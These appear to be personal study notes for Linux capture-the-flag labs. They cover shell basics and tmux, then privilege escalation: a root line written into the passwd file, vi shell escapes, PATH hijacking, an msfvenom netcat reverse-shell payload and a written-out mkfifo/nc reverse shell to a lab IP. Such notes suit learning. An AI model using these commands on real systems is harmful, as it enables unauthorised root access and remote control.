echo > overwrite

echo >> append

&& and only works if both commands are valid
& background operator. e.g sleep 5 &, this puts a command in background
$ environement variables e.g $USER
export <varname>=<value>
grep, some commands use - as grep
grep <string> <file> <file2> -n | here n will specify the strings line number
; works like && but executed even if 1st command fail
chsh changes deafult shell for user
chmod 777
chown user:group file --can only do it if above other user
-R recursive all files in the dir
ln hard link |||| ln <source> <destination>
ln -s symbolic link
grep expression file -n --- line number
sudo -l -- list priviliges
sudo -u <user> command
adduser <user>
addgroup <group>
usermod -a -G <group> <user>
which shows full path of the exes
ps -ef all system processes
kill <PID>
top -- shows which processes use most system
2>>/dev/null
crontab -l --list cron jobs
find dir -user <user> || -group works as well
find / flag* 2>>/dev/null | grep flag5
find / -perm | searches for specific permissions
find [path] [arguments] -exec [command] {} \;
tar -xzf flag8.tar.gz 2>>
alias - to view commnad aliases
aliases saved in bashrc
MOTD files in /etc/motd or /etc/update-motd.d ||||||||||||
cat /etc/update-motd.d/00-header
diff file1.txt file2.txt
logs stored in /var/log
uname -a system info
/etc/os-release
hostnamectl
lsb_release -a
/etc/*release (os-release and lsb-release)
mount point in media
nano to specific line
base64 -e/-d (encode or decode) file
xxd -r -p flag22 | reverse hex to ascii
find / -xdev -type f -print0 2>/dev/null | xargs -0 grep -E '^[a-z0-9]{32}$'
2>/dev/null
cat flag29 | tr -d ' ' >flag29_noS
$ cat flag29_noS | tr -d '/n' >flag29_noSN
$ cat flag29_noSN
curl 127.0.0.1
mysql -u <user> -p<password>
show databases;
use database;
show tables;
personal path varaible /home/user/.profile
printenv - prints env variables
/etc/group - list of groups on system
echo <string> | rev --- to reverse the string
systemctl start apache2

TMUX
? show the list of commands
tmux --- new session without a custom name
All commands with ctrl+B
D - detach sessions
sessions --- windows ---- panes
% new pane vertical
" new pane horizontal
X kill pane
tmux ls -- list sessions
ctrl+<arrows> resize pane
<arrows> move from panes
C --- create window
ctrl+ b 0-9 set windows
[ --- copy mode

LINUX PRIV ESC

linenum.sh https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
attcker machine - python httpserver - wget on victim machine- chmod +x lunenum.sh -
execute
or use copy paste on text editor on victim machine

Linenum focuses on kernel info, sensitive files, suid files, crontabs

find / -perm -u=s -type f 2>/dev/null -- to find suid files on system
-perm mode
File's permission bits are exactly mode (octal or symbolic). Since
an exact match is required, if you want to use this form for symbolic modes, you
may have to specify a rather complex mode
string. For example `-perm g=w' will only match files which have
mode 0020 (that is, ones for which group write permission is the only permission
set). It is more likely that you will want
to use the `/' or `-' forms, for example `-perm -g=w', which matches
any file with group write permission.

-perm -mode
All of the permission bits mode are set for the file. Symbolic modes
are accepted in this form, and this is usually the way in which you would want to
use them. You must specify `u', `g' or
`o' if you use a symbolic mode.

-perm /mode
Any of the permission bits mode are set for the file. Symbolic
modes are accepted in this form. You must specify `u', `g' or `o' if you use a
symbolic mode. See the EXAMPLES section for
some illustrative examples. If no permission bits in mode are set,
this test matches any file (the idea here is to be consistent with the behaviour of
-perm -000).

Operators join together the other items within the expression. They include for
example -o (meaning logical OR) and -a (meaning logical AND).
\(...\) -- expression inside this syntax

/etc/shells -- shows available shells on system

user:x:0:0:root:/root:/bin/bash ------ passwd file general entry username password

x is encrypted 0 user id 0 gid root(info) /root home /bin/bash shell

openssl passwd [-help] [-crypt] [-1] [-apr1] [-salt string] [-in file] [-stdin] [-
noverify] [-quiet] [-table] {password}
openssl passwd -1 -salt new 123 -- $1$new$p7ptkEKU1HnaHpRtzNizS1

user:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash

ESCAPE VI
check sudo -l which user can run which commands as root
enter : to start entering in vim
:!sh to call shell
:!/bin/bash to call /bin/bash
https://gtfobins.github.io/

CRONTAB
MIN What minute to execute at
HOUR What hour to execute at
DOM What day of the month to execute at
MON What month of the year to execute at
DOW What day of the week to execute at
CMD The actual command that will be executed.
0 *12 * * * cp -R /home/cmnatic/Documents /var/backups/
crontab -e -- edit crontabs

msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R

mkfifo /tmp/jzzf; nc 10.10.90.95 8888 0</tmp/jzzf | /bin/sh >/tmp/jzzf 2>&1; rm

/tmp/jzzf

PATH VARIABLE
run script it points to ls- to change this script we create a fine in tmp with name
ls contaning /bin/bash --- script file SUID root
now export PATH=/tmp:$PATH --- now everytime ls is run from script it will open
bash as root
real ls path /bin/lsn

1. python -c "import pty; pty.spawn('/bin/bash');"

2. export xterm=TERM
3. ctrl+z
4. stty raw -echo; fg

SCP:
scp important.txt [email protected]:/home/ubuntu/transferred.txt --- local to
remote
scp [email protected]:/home/ubuntu/documents.txt notes.txt --- remote to
local